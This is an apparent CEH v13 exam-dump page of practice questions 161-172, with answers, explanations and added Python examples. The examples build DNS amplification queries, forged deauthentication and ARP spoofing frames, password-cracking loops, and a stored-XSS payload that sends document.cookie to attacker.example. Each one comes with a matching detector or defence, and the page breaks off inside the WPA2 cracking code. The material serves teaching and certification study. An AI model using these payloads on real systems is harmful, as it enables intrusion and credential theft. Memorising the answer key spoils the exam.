ECCouncil 312-50v13 Certified Ethical Hacker v13 Exam Dumps and Practice Test Questions Set 9 Q161-180


Question 161 

An attacker sends thousands of DNS requests using spoofed IP addresses to overload a DNS server. What type of attack is this?

A) DNS amplification attack
B) DNS poisoning
C) DNS tunneling
D) DNS cache snooping

Answer:  A) DNS amplification attack

Explanation: 

DNS poisoning involves manipulating DNS entries so that victims receive incorrect IP address information. It focuses on corrupting DNS records rather than overwhelming a DNS server with traffic. Because poisoning focuses on altering stored values rather than generating large volumes of requests, it is not the attack described.

DNS tunneling allows attackers to encode data inside DNS queries and responses to bypass firewalls or exfiltrate information. It is a covert communication method and not intended to overload the server with traffic. Tunneling is about data transfer and evasion, not about volumetric flooding.

DNS cache snooping sends non-recursive queries (recursion-desired bit cleared) to a resolver and checks whether it answers from cache, which reveals which names the resolver's users have recently looked up. It is low-volume reconnaissance that neither spoofs source addresses nor overwhelms the server.

A DNS amplification attack is a reflected DDoS. The attacker sends small queries (classically type ANY, usually with an EDNS0 OPT record advertising a large UDP payload size) to many open resolvers, with the source address spoofed to that of the victim. Each resolver answers with a response many times larger than the query and sends it to the spoofed address, so the resolvers act as reflectors and the victim's link is flooded with traffic it never asked for; the resolvers themselves also absorb the query load. Of the options given, only amplification combines spoofed source addresses with high query volume, so A is the intended answer. Two points a practitioner should keep in mind: the attack only works because the resolver answers queries from arbitrary sources (open recursion) and because the attacker's upstream network does not validate source addresses (BCP 38 ingress filtering). Restricting recursion to known clients, response rate limiting, minimal responses to ANY, and source-address validation are the standard mitigations.
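Added example (not part of the original question set, and not code from any tool named on this page): building a query in DNS wire format in Python shows why a 40-byte query can pull a multi-kilobyte answer, and how a victim can recognise reflected responses at its own network edge. The domain name, the resolver addresses and the oversized response are constructed for the example; nothing is sent on the wire.

```python
import struct

# Constructed example: nothing is sent. We build a real DNS query (RFC 1035
# header + question, plus an EDNS0 OPT record per RFC 6891), build a padded
# response of the kind an open resolver returns for a large zone, and compare
# the two sizes.

def encode_name(name: str) -> bytes:
    """'example.com' -> b'\\x07example\\x03com\\x00' (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_query(name: str, qtype: int = 255, txid: int = 0x1234, edns_size: int = 4096) -> bytes:
    """Single-question query. qtype 255 (ANY) is the classic amplification type;
    the OPT record advertises that the sender accepts UDP replies up to
    edns_size bytes, so the resolver need not truncate at 512 bytes."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)   # flags RD=1; QDCOUNT=1, ARCOUNT=1
    question = encode_name(name) + struct.pack("!HH", qtype, 1)  # QTYPE, QCLASS=IN
    opt = b"\x00" + struct.pack("!HHIH", 41, edns_size, 0, 0)   # root name, TYPE=OPT, UDP size, TTL/flags, RDLEN
    return header + question + opt

def build_padded_response(query: bytes, answer_count: int, rdata_len: int) -> bytes:
    """Constructed reply: same transaction ID, the echoed question, then
    answer_count records whose owner name is a compression pointer to the
    question name (0xC00C) and whose RDATA is rdata_len filler bytes."""
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, answer_count, 0, 0)  # QR=1 RD=1 RA=1
    qname_end = query.index(b"\x00", 12) + 1
    question = query[12:qname_end + 4]
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 16, 1, 300, rdata_len) + b"A" * rdata_len  # TXT, IN, TTL 300
    return header + question + rr * answer_count

def amplification_factor(query: bytes, response: bytes) -> float:
    """Bytes the victim receives per byte the attacker had to send."""
    return len(response) / len(query)

def reflected_responses(outbound_queries, inbound_responses):
    """Victim-side check. Each tuple is (src_ip, dst_ip, txid) as seen at the
    host's network edge. A DNS response that no outbound query from this host
    explains is reflected traffic: someone else sent the query using our address."""
    sent = {(dst, txid) for (_src, dst, txid) in outbound_queries}
    return [r for r in inbound_responses if (r[0], r[2]) not in sent]

if __name__ == "__main__":
    q = build_query("example.com")
    r = build_padded_response(q, answer_count=10, rdata_len=300)
    print(f"query {len(q)} bytes, response {len(r)} bytes, factor {amplification_factor(q, r):.1f}x")
    # Constructed traffic: this host asked 192.0.2.53 once; 198.51.100.7 was never queried.
    seen = reflected_responses([("10.0.0.5", "192.0.2.53", 0x1234)],
                               [("192.0.2.53", "10.0.0.5", 0x1234), ("198.51.100.7", "10.0.0.5", 0x4242)])
    print("reflected:", seen)
```

The factor printed is a property of the response, not of the attacker: a resolver that rate-limits, answers ANY minimally or refuses recursion for outside clients drives it towards 1, which is why those are the fixes rather than anything on the victim's side.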

Question 162 

Which type of malware encrypts files on a victim’s system and demands payment for decryption?

A) Rootkit
B) Ransomware
C) Logic bomb
D) Spyware

Answer: B) Ransomware

Explanation: 

A rootkit hides malicious activity by embedding itself deep inside the operating system. Its purpose is to remain undetected, conceal backdoors, or hide processes. Rootkits do not encrypt user files or demand payment. They are stealthy persistence mechanisms rather than extortion tools.

Ransomware encrypts files or entire systems and refuses to restore access unless a ransom is paid. It typically uses strong cryptographic algorithms and displays a payment notification demanding money, often in cryptocurrency. Because the question specifically describes malware that encrypts files and demands payment, ransomware is the correct answer.

A logic bomb executes a malicious payload when triggered by specific conditions, such as a date or system event. It does not inherently encrypt files or request payment. It is based on logic and timing, not extortion.

Spyware monitors user activities, collects sensitive data, or tracks browsing behavior. It silently gathers information rather than encrypting files or extorting victims. Its purpose is surveillance, not ransom.

The only malware type designed to encrypt data and demand payment is ransomware.

Question 163

Which wireless attack forces clients to reconnect so the attacker can capture the WPA/WPA2 four-way handshake?

A) Deauthentication attack
B) Evil twin attack
C) KRACK attack
D) Wardriving

Answer:  A) Deauthentication attack

Explanation: 

An evil twin attack creates a rogue access point that mimics a legitimate one. While this can lead to credential theft or man-in-the-middle attacks, it does not inherently force clients to reconnect by disconnecting them. Its purpose is impersonation, not forced reconnection for handshake collection.

KRACK (key reinstallation attack) exploits a flaw in how WPA2 clients process the four-way handshake: by blocking and replaying message 3, an attacker forces the client to reinstall an already-in-use key and reset its nonce counter, which allows decryption or replay of frames. It manipulates handshake messages at the protocol level; it does not rely on deauthentication frames and is not a way of collecting the handshake for offline cracking.

Wardriving is simply scanning for wireless networks while moving through an area using equipment mounted on a vehicle. It is a reconnaissance technique and does not involve forcing client reconnections.

A deauthentication attack sends forged 802.11 deauthentication management frames, with the access point's address as the sender, to one client or to the broadcast address, forcing clients off the network. When they reconnect automatically, the attacker's sniffer captures the WPA/WPA2 four-way handshake, which can then be used for offline password cracking. Because the attack described in the question matches this behavior exactly, deauthentication attack is the correct answer. Two practical caveats: the attack works on networks without Protected Management Frames because management frames there are unauthenticated, so any station obeys a forged one; where 802.11w is required, forged deauthentication frames are discarded and the technique fails. And a capture of messages 1 and 2 (or 2 and 3) of the handshake is enough for offline cracking, since message 2 already carries a MIC computed from the key.
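Added example (not from the original page and not aireplay-ng's code): a deauthentication frame built byte by byte in Python, parsed back, and a wireless-IDS-style check that flags a burst of unprotected deauth frames from one BSSID. The MAC addresses, timestamps and the threshold of 20 frames per second are constructed assumptions; nothing is transmitted.

```python
import struct

# Constructed example: build an 802.11 deauthentication frame (nothing is
# transmitted), parse it back, and flag a deauth burst in a capture.
# Timestamps are seconds; MAC addresses are made up.

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def build_deauth(client: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Management frame, subtype 12 (deauthentication).
    Frame Control byte 0 = 0xC0: subtype 1100, type 00 (management), version 00.
    Addr1 = receiver (client or ff:ff:ff:ff:ff:ff), Addr2 = transmitter (the AP,
    forged), Addr3 = BSSID. Reason 7 = class 3 frame from nonassociated STA,
    the code aireplay-ng sends by default."""
    frame_control = b"\xc0\x00"
    duration = b"\x00\x00"
    seq_ctrl = struct.pack("<H", (seq & 0xFFF) << 4)  # fragment 0, sequence number
    return (frame_control + duration + mac_bytes(client) + mac_bytes(bssid) +
            mac_bytes(bssid) + seq_ctrl + struct.pack("<H", reason))

def parse_frame(frame: bytes) -> dict:
    fc0, fc1 = frame[0], frame[1]
    info = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "protected": bool(fc1 & 0x40),   # set on 802.11w-protected management frames
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
    }
    if info["type"] == 0 and info["subtype"] == 12:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info

def deauth_flood_sources(timed_frames, window: float = 1.0, threshold: int = 20):
    """Return BSSIDs that sent at least `threshold` unprotected deauth frames
    within any `window` seconds. A real AP sends a few per roaming event; an
    attacker sends dozens per second, usually to the broadcast address."""
    times = {}
    for ts, frame in timed_frames:
        p = parse_frame(frame)
        if p["type"] == 0 and p["subtype"] == 12 and not p["protected"]:
            times.setdefault(p["addr3"], []).append(ts)
    flagged = []
    for bssid, stamps in times.items():
        stamps.sort()
        lo = 0
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged.append(bssid)
                break
    return flagged

if __name__ == "__main__":
    burst = [(i * 0.02, build_deauth("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", seq=i)) for i in range(50)]
    print(parse_frame(burst[0][1]))
    print("flood from:", deauth_flood_sources(burst))
```

The detector ignores frames with the Protected Frame bit set because on an 802.11w network those are the only ones a client will act on; a burst of unprotected deauth frames there is noise for the clients but still a useful indicator of an attacker in range.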

Question 164 

What type of assessment simulates an attacker with full internal knowledge of the environment, including network diagrams and credentials?

A) Gray-box assessment
B) Black-box assessment
C) White-box assessment
D) Red teaming

Answer: C) White-box assessment

Explanation:

A gray-box assessment gives testers partial knowledge such as limited credentials or selective diagrams. It simulates a user with some internal access but not full visibility. It is not equivalent to having complete details about the environment.

A black-box assessment provides no prior knowledge. Testers perform reconnaissance as an external attacker would, gathering information from scratch. This is the opposite of the scenario described, which gives full internal knowledge.

A white-box assessment gives complete visibility into the environment, including source code, diagrams, architecture details, and often valid credentials. It allows comprehensive testing of internal components and identifies deep-level vulnerabilities. Because the question describes full internal knowledge, white-box is the correct answer.

Red teaming is an adversarial simulation mimicking malicious attacker behavior. It focuses on goals, stealth, persistence, and realistic intrusion attempts, not necessarily full knowledge. Red teams may operate with black-box or gray-box assumptions depending on the engagement. They do not automatically receive full internal data.

Thus white-box assessment matches the description exactly.

Question 165 

Which attack manipulates ARP messages to associate the attacker’s MAC address with another device’s IP address?

A) ARP spoofing
B) DNS spoofing
C) ICMP redirect attack
D) DHCP spoofing

Answer:  A) ARP spoofing

Explanation: 

DNS spoofing involves falsifying DNS responses to redirect victims to fraudulent IP addresses. It occurs at the domain name resolution level and has nothing to do with MAC-to-IP associations.

An ICMP redirect attack uses specially crafted ICMP messages to instruct a device to send traffic through a different router. Although it alters routing behavior, it does not manipulate ARP tables or change MAC associations.

DHCP spoofing involves setting up a rogue DHCP server that distributes incorrect configuration settings such as gateways or IPs. It does not rely on altering ARP entries; instead, it deceives clients during the DHCP negotiation.

ARP spoofing manipulates ARP replies to poison a target’s ARP cache so that an attacker’s MAC address becomes associated with the IP address of another device, such as a gateway. This enables man-in-the-middle attacks, packet interception, or traffic redirection. The description in the question matches ARP spoofing exactly, making it the correct answer.
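Added example (not from the original page): the Ethernet/ARP reply an ARP spoofer sends, built in Python, and the arpwatch-style logic that notices the gateway's IP suddenly answering from a different MAC. Addresses are constructed; the watcher is illustrative, not a real tool's code.

```python
import struct

# Constructed example: the frame an ARP spoofer sends, and the watcher logic
# (arpwatch-style) that notices the gateway's MAC changing. Addresses are made up.

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying an ARP reply (opcode 2): 'sender_ip is at
    sender_mac'. A spoofer sends this unsolicited, with sender_ip set to the
    gateway and sender_mac set to its own interface; most stacks update their
    cache on any reply, solicited or not."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"   # dst, src, EtherType ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2) +                   # Ethernet, IPv4, hlen, plen, REPLY
           mac_bytes(sender_mac) + ip_bytes(sender_ip) +
           mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp

def parse_arp(frame: bytes):
    if frame[12:14] != b"\x08\x06":
        return None
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", frame[14:22])
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}

class ArpWatcher:
    """Tracks IP -> MAC bindings seen in ARP replies and reports changes.
    In a stable LAN the gateway's binding never changes; a flip to a new MAC,
    and later a flip back when the attacker restores the table, is the
    fingerprint of an ARP poisoning man-in-the-middle."""
    def __init__(self):
        self.table = {}

    def observe(self, frame: bytes):
        a = parse_arp(frame)
        if a is None or a["op"] != 2:
            return None
        prev = self.table.get(a["sender_ip"])
        self.table[a["sender_ip"]] = a["sender_mac"]
        if prev is not None and prev != a["sender_mac"]:
            return f"ALERT {a['sender_ip']} changed {prev} -> {a['sender_mac']}"
        return None

if __name__ == "__main__":
    GATEWAY, VICTIM = "192.168.1.1", "192.168.1.10"
    w = ArpWatcher()
    # Legitimate reply from the real gateway, then the attacker's forged one.
    for frame in (build_arp_reply("00:11:22:33:44:55", GATEWAY, "aa:bb:cc:dd:ee:01", VICTIM),
                  build_arp_reply("de:ad:be:ef:00:01", GATEWAY, "aa:bb:cc:dd:ee:01", VICTIM)):
        print(w.observe(frame))
```

Detection after the fact is the weaker control; on managed switches Dynamic ARP Inspection (validating replies against DHCP snooping bindings) and, on critical hosts, static ARP entries for the gateway stop the poisoning before the cache is touched.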

Question 166 

Which method attempts to guess a cryptographic key by trying all possible key combinations?

A) Rainbow table attack
B) Side-channel attack
C) Brute force attack
D) Birthday attack

Answer: C) Brute force attack

Explanation: 

A brute force attack is a fundamental cryptographic attack technique in which an attacker attempts to guess the correct key or password by systematically testing every possible combination within the key space. This method is exhaustive and guarantees eventual success if the key or password is within the attackable range and computational resources are sufficient. Brute force attacks do not rely on shortcuts, precomputed tables, predictions, or user behavior—they simply attempt every combination until the correct one is found. This makes brute force attacks extremely reliable, though often computationally expensive and time-consuming, especially when key lengths are long or character sets are complex.

A rainbow table attack, by contrast, is a time-memory trade-off for reversing unsalted hashes. The table stores the endpoints of long hash-and-reduce chains precomputed over a chosen character set and length range, so a captured hash can be looked up quickly instead of being recomputed from scratch. It does not try every key at attack time, it only covers the keyspace the table was built for, and a per-password salt defeats it entirely because a separate table would be needed for every salt value.

Side-channel attacks exploit physical characteristics of devices performing cryptographic operations, such as timing information, power consumption, electromagnetic emissions, or even acoustic signals. By analyzing these characteristics, attackers can infer information about cryptographic keys. Side-channel attacks are indirect and observational; they do not involve systematically trying every possible key, making them fundamentally different from brute force attacks.

Birthday attacks exploit mathematical properties of hash functions, particularly the probability of collisions in hash outputs. Instead of attempting every key combination, a birthday attack focuses on generating two distinct inputs that produce the same hash value. This approach is based on probability theory rather than exhaustive enumeration and is effective primarily against hash functions, not key spaces.

Because the question explicitly describes attempting all possible key combinations, the brute force attack fits this definition precisely. It is defined by its exhaustive nature and methodical coverage of the entire key space, making it distinct from rainbow tables, side-channel attacks, or birthday attacks.

Question 167 

Which type of SQL injection attack uses semicolons to append additional queries after a legitimate query?

A) Tautology injection
B) Union-based injection
C) Piggy-backed injection
D) Blind injection

Answer: C) Piggy-backed injection

Explanation: 

Piggy-backed SQL injection (also called stacked-query injection) is a technique in which attackers append additional statements to a legitimate SQL statement, separated by a semicolon or another statement delimiter. The primary query executes normally, and the injected statements execute immediately afterward. This lets an attacker perform operations the original query never could, such as creating users, deleting records, writing to other tables, or calling stored procedures, which makes it more powerful than injections that can only reshape a single SELECT. Whether stacked queries actually run depends on the database and the client API as much as on the injection point: Microsoft SQL Server and PostgreSQL client libraries commonly accept several statements in one call, while many MySQL and SQLite APIs execute only the first statement and reject the rest, so a tester confirms stacked-query support before relying on it.

Tautology-based injection, in contrast, manipulates conditional logic in SQL statements so that expressions always evaluate to true. It is commonly used to bypass authentication mechanisms, such as altering a login query to grant access without valid credentials, but it does not involve executing multiple queries sequentially.

Union-based injection uses the SQL UNION operator to combine the results of the original query with attacker-controlled queries. This technique is primarily used to extract data from additional tables or columns but does not append separate queries for execution after the original statement.

Blind SQL injection occurs when the database suppresses error messages or output, making it impossible to directly view query results. Attackers infer information by observing changes in behavior, response time, or content, rather than by directly executing multiple appended queries.

Since the question specifies using semicolons to append additional queries, piggy-backed injection is the exact match. It allows attackers to execute additional SQL commands sequentially after the original query, which is precisely what differentiates it from tautology, union-based, or blind injection attacks.

Question 168 

Which type of password attack uses rules to modify dictionary words to generate variations?

A) Dictionary attack
B) Hybrid attack
C) Brute force attack
D) Credential stuffing

Answer: B) Hybrid attack

Explanation:

A hybrid password attack is a technique that combines dictionary-based wordlists with systematic rules to generate variations of base words. Attackers begin with a dictionary of common passwords, phrases, or known credentials and then apply transformations to increase coverage. These transformations may include appending numbers, substituting characters with symbols (for example, replacing “a” with “@”), capitalizing letters, reversing words, or inserting special characters. The purpose is to simulate real-world password habits, such as users slightly modifying a common word to meet complexity requirements. Hybrid attacks strike a balance between efficiency and effectiveness, as they are more targeted than brute force attacks while more comprehensive than simple dictionary attacks.

In contrast, a dictionary attack relies solely on a static wordlist without any modifications. The attacker tests each entry in the list as-is, making the approach limited to the dictionary contents. While dictionary attacks are fast and often effective against weak passwords, they do not create new password variations through rules or transformations.

Brute force attacks attempt every possible combination of characters within a defined key or password space. They do not rely on dictionary words or rule-based modifications, making them exhaustive but computationally intensive. Credential stuffing uses previously leaked usernames and passwords to attempt unauthorized logins across multiple sites. It does not generate variations of dictionary words and instead relies entirely on valid credentials obtained from prior breaches.

Because the question explicitly asks for an attack method that modifies dictionary words using rules to generate variations, the hybrid attack is the correct choice. It uniquely combines dictionary wordlists with algorithmic transformations to maximize the chance of guessing passwords while remaining efficient.
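Added example (not from the original page and not hashcat's or John the Ripper's code) covering both Question 166 and this one: the three strategies side by side in Python. A salted SHA-256 stands in for whatever hash the target stores, the wordlist and the target passwords are constructed, and the mangling rules are a small hand-written subset of the kind a rule engine applies.

```python
import hashlib
import itertools
import string

# Constructed example: salted SHA-256 stands in for the target's hash function;
# the wordlist and the passwords being recovered are made up.

LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
ALPHANUM = string.ascii_lowercase + string.digits

def hash_pw(password: str, salt: bytes) -> str:
    return hashlib.sha256(salt + password.encode()).hexdigest()

def rule_variants(word: str):
    """Mangling rules of the kind hashcat/John apply to each wordlist entry:
    case changes, leetspeak, appended digits, years and a trailing '!'."""
    bases = {word, word.capitalize(), word.upper(), word.translate(LEET), word.capitalize().translate(LEET)}
    for b in bases:
        yield b
        yield b + "!"
        for n in range(100):
            yield f"{b}{n}"
            yield f"{b}{n}!"
        for year in range(1990, 2026):
            yield f"{b}{year}"

def dictionary_attack(target: str, salt: bytes, words):
    """Tries each word exactly as listed."""
    for w in words:
        if hash_pw(w, salt) == target:
            return w
    return None

def hybrid_attack(target: str, salt: bytes, words):
    """Dictionary plus rules: a few hundred candidates per base word."""
    for w in words:
        for candidate in rule_variants(w):
            if hash_pw(candidate, salt) == target:
                return candidate
    return None

def brute_force(target: str, salt: bytes, alphabet: str, max_len: int):
    """Exhaustive search of every string up to max_len over alphabet. It always
    finds the answer eventually; the cost is keyspace(len(alphabet), max_len)."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            candidate = "".join(tup)
            if hash_pw(candidate, salt) == target:
                return candidate
    return None

def keyspace(alphabet_size: int, max_len: int) -> int:
    return sum(alphabet_size ** n for n in range(1, max_len + 1))

if __name__ == "__main__":
    salt = b"s4lt"
    words = ["summer", "welcome", "password"]
    target = hash_pw("P@$$w0rd24!", salt)          # a dictionary word 'strengthened' by hand
    print("dictionary:", dictionary_attack(target, salt, words))
    print("hybrid:    ", hybrid_attack(target, salt, words))
    print("brute-force candidates, 8 chars over 95 printable:", keyspace(95, 8))
    print("brute force:", brute_force(hash_pw("ab1", salt), salt, ALPHANUM, 3))
```

The dictionary pass misses the target, the hybrid pass recovers it after a few thousand hashes, and the brute-force function is shown on a three-character secret only because the keyspace figure makes clear why nobody runs it against eight printable characters with a slow hash. Against real password stores the per-candidate cost is dominated by the hash (bcrypt, scrypt, Argon2), which is the defender's lever.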

Question 169 

Which tool is commonly used to perform SMB enumeration on Windows networks?

A) Aircrack-ng
B) Enum4linux
C) Nmap Harbour
D) Hydra

Answer: B) Enum4linux

Explanation: 

Enum4linux is a widely used open-source tool designed specifically for enumerating Windows and Samba systems over SMB (Server Message Block). It retrieves information about users, groups, shares, and password and security policies without exploiting any vulnerability, which makes it a standard first step when assessing a Windows network. Under the hood it is a wrapper around Samba's smbclient, rpcclient, net and nmblookup commands, and it queries SMB and NetBIOS services for usernames, group memberships, password policy settings, OS details and accessible shares, which a tester can later use for password attacks, privilege escalation, or network mapping. One caveat a practitioner should know: most of its output depends on a null session (anonymous login to IPC$), which modern Windows versions disable by default; against such hosts it returns little, and enumeration with valid credentials is needed instead.

Aircrack-ng is a suite of wireless security tools used primarily for auditing Wi-Fi networks. It focuses on monitoring, cracking WEP and WPA/WPA2 keys, and packet analysis. It does not provide SMB enumeration capabilities or interact with Windows shares.

Nmap is a versatile network scanning tool capable of performing SMB enumeration through scripts (NSE), but “Nmap Harbour” is not a standard or recognized component, making it an incorrect option in this context. Nmap itself can enumerate SMB hosts but is not specifically tailored for detailed Windows SMB enumeration like Enum4linux.

Hydra is a brute force login tool used to test passwords across numerous protocols, including SMB, FTP, SSH, HTTP, and more. While it can attempt authentication against SMB services, it does not enumerate users, groups, or shared resources.

Since the question specifically asks for a tool designed for SMB enumeration on Windows networks, Enum4linux is the correct and precise choice. Its capabilities are uniquely suited to gather SMB-related information comprehensively, efficiently, and reliably.

Question 170 

Which type of attack involves an attacker capturing encrypted traffic and analyzing it later to attempt decryption?

A) Man-in-the-middle attack
B) Replay attack
C) Passive attack
D) Keylogging attack

Answer: C) Passive attack

Explanation: 

A passive attack is a method in which an adversary monitors or eavesdrops on network communications without actively interfering with or altering the data. The attacker captures network traffic—potentially including encrypted communications—with the goal of analyzing it offline for intelligence or cryptographic weaknesses. Passive attacks preserve the integrity of the original communication, making them stealthy and difficult to detect, which contrasts sharply with active attacks that inject, modify, or disrupt traffic.

Man-in-the-middle (MITM) attacks intercept and modify traffic in real-time between two endpoints. Although MITM attacks involve capturing data, they are active because the attacker manipulates communications, alters content, or injects malicious messages. This makes MITM attacks distinct from passive attacks that solely observe and collect information.

Replay attacks involve capturing data packets and resending them to produce repeated actions, such as unauthorized transactions or repeated authentication attempts. While they do capture traffic, their focus is on resending or repeating actions, not on offline cryptanalysis or decryption attempts.

Keylogging attacks focus on recording user keystrokes to obtain sensitive information, such as passwords or personal data. Keylogging does not involve capturing encrypted network traffic or attempting decryption.

In passive attacks, the collected encrypted traffic can be stored and analyzed later using various cryptanalytic techniques. Attackers might attempt to decrypt messages offline, exploit weak or deprecated algorithms, or look for patterns and metadata in encrypted data. Since the question explicitly refers to capturing encrypted traffic and analyzing it later for decryption, passive attack precisely matches this description. Because nothing is altered on the wire, the target cannot detect the capture after the fact, so the defense is to make captured traffic worthless later: ephemeral key exchange (forward secrecy), so that a later compromise of the server's long-term key does not decrypt old sessions, and retiring weak cipher suites before, not after, they become practical to break. This "harvest now, decrypt later" concern is the reason long-lived secrets are migrated off algorithms expected to weaken.

Question 171 

Which type of XSS attack stores malicious scripts in a web application’s database for later execution?

A) Reflected XSS
B) Stored XSS
C) DOM-based XSS
D) Self-XSS

Answer: B) Stored XSS

Explanation: 

Stored cross-site scripting (XSS) is a severe web vulnerability in which an attacker injects malicious scripts into a web application that persist in the server-side storage, such as databases, message boards, comment sections, or logs. Once stored, these scripts are served to users who access the affected pages, causing the script to execute automatically in their browsers. Stored XSS is particularly dangerous because it can impact multiple users over time without requiring them to click on malicious links or perform any special action, unlike reflected XSS, which is transient and only executes immediately after a user submits crafted input via URLs or form fields.

Reflected XSS occurs when user input is immediately returned in a server’s response, causing temporary script execution. It does not persist in the database or application storage, making it unsuitable for attacks that target multiple users over time. DOM-based XSS, in contrast, executes entirely on the client side by manipulating the Document Object Model of a webpage. The payload runs when the client’s browser interprets the modified DOM, but no server-side storage is involved. Self-XSS relies on social engineering, tricking users into pasting malicious scripts into their own browsers. It requires direct user interaction, unlike stored XSS, which automatically propagates to anyone accessing the infected content.

Because the question explicitly mentions scripts stored in a database for later execution, stored XSS fits the scenario. The key characteristic is persistence in server-side storage and automatic execution in end users' browsers, which gives the attack wide reach. Attackers use stored XSS to steal session tokens, perform actions as the victim, redirect users, or deliver further malware, making it one of the most critical XSS types in web application security. The defenses are the same as for the other XSS variants: context-aware output encoding at render time (HTML-escaping body text and attribute values), a Content Security Policy that blocks inline scripts, and HttpOnly session cookies so that a successful payload cannot read them. Filtering at storage time is a secondary control, because the same stored value may later be rendered in several different contexts.
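Added example (not from the original page): a minimal comment feature in Python, backed by SQLite, rendered once by concatenation and once with output encoding. The comments, the attacker's collection host attacker.example and the payload are constructed; note that the insert is parameterized, which shows that SQL injection safety says nothing about XSS.

```python
import html
import sqlite3

# Constructed example: a comment feature backed by SQLite. The attacker's
# collection host attacker.example and the comments are made up.

PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'

def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    return conn

def post_comment(conn, author: str, body: str) -> None:
    # Parameterized insert: safe against SQL injection, and irrelevant to XSS.
    # The script is stored verbatim, as user data should be.
    conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))

def render_vulnerable(conn) -> str:
    """Template that concatenates stored text straight into HTML: every visitor
    who loads the page runs the attacker's script in their own session."""
    rows = conn.execute("SELECT author, body FROM comments ORDER BY id").fetchall()
    return "\n".join(f"<p><b>{author}</b>: {body}</p>" for author, body in rows)

def render_safe(conn) -> str:
    """Same template with HTML output encoding at render time; the stored
    payload is displayed as text, not parsed as markup."""
    rows = conn.execute("SELECT author, body FROM comments ORDER BY id").fetchall()
    return "\n".join(f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>" for author, body in rows)

def script_tags(page: str) -> int:
    """Crude count of live <script> elements in rendered HTML, used as the check here."""
    return page.lower().count("<script")

if __name__ == "__main__":
    db = setup()
    post_comment(db, "mallory", PAYLOAD)
    post_comment(db, "bob", "Nice article!")
    print(render_vulnerable(db))
    print(script_tags(render_vulnerable(db)), "script element(s) in the vulnerable page")
    print(render_safe(db))
    print(script_tags(render_safe(db)), "script element(s) in the safe page")
```

html.escape is the right encoder for element content and for double-quoted attribute values; text placed inside a script block, a URL, or an inline event handler needs the encoder for that context, which is why the usual advice is to let the template engine do it automatically rather than escaping by hand.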

Question 172 

Which tool is commonly used to crack wireless WPA/WPA2 PSK passwords?

A) Aircrack-ng
B) Nikto
C) Burp Suite
D) Metasploit

Answer:  A) Aircrack-ng

Explanation: 

Aircrack-ng is a suite of tools for auditing wireless networks that use WEP, WPA and WPA2. The division of labour within the suite matters for the question: airmon-ng puts the adapter into monitor mode, airodump-ng captures traffic and records the WPA/WPA2 four-way handshake when a client authenticates, aireplay-ng can inject deauthentication frames to provoke that handshake, and aircrack-ng itself performs the offline attack. For each candidate passphrase it derives the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), expands it to the PTK using the two MAC addresses and the two nonces from the handshake, and checks whether the resulting key reproduces the MIC on the captured EAPOL frame. The PBKDF2 step is deliberately slow, which is why cracking throughput is measured in PMKs per second and why GPU-based tools such as hashcat are often used for the same computation. This workflow makes the suite one of the most widely used in Wi-Fi security assessments.

Nikto is a web server vulnerability scanner that identifies outdated software, misconfigurations, and common vulnerabilities in HTTP services. It does not interact with wireless protocols or capture Wi-Fi handshakes, making it irrelevant for WPA/WPA2 cracking. Burp Suite is a web application testing platform designed for intercepting, modifying, and analyzing HTTP requests to identify vulnerabilities. While it excels at web security testing, it cannot perform wireless password cracking. Metasploit is an exploitation framework that automates attacks against various system vulnerabilities, but it does not specialize in recovering wireless PSKs.

Since the question specifically asks for a tool designed to crack WPA/WPA2 pre-shared keys, Aircrack-ng is the correct answer. Its ability to capture authentication handshakes and perform offline password recovery through dictionaries or brute-force methods makes it essential for auditing Wi-Fi network security.
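Added example (not aircrack-ng's code, and not from the original page): the offline check aircrack-ng performs per candidate, written out in Python with the standard library. The SSID, MAC addresses, nonces and the EAPOL message 2 frame are constructed, with the MIC computed under the true passphrase so the dictionary attack has something to verify against. The PMK derivation is checked against the IEEE 802.11i test vector ("password" / "IEEE").

```python
import hashlib
import hmac
import struct

# Constructed example: the handshake fields (SSID, MACs, nonces, EAPOL message 2)
# are made up, and the MIC is computed with the true passphrase so that the
# wordlist attack has something to verify against. Nothing is captured live.

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step and the reason cracking speed is quoted in PMKs/s."""
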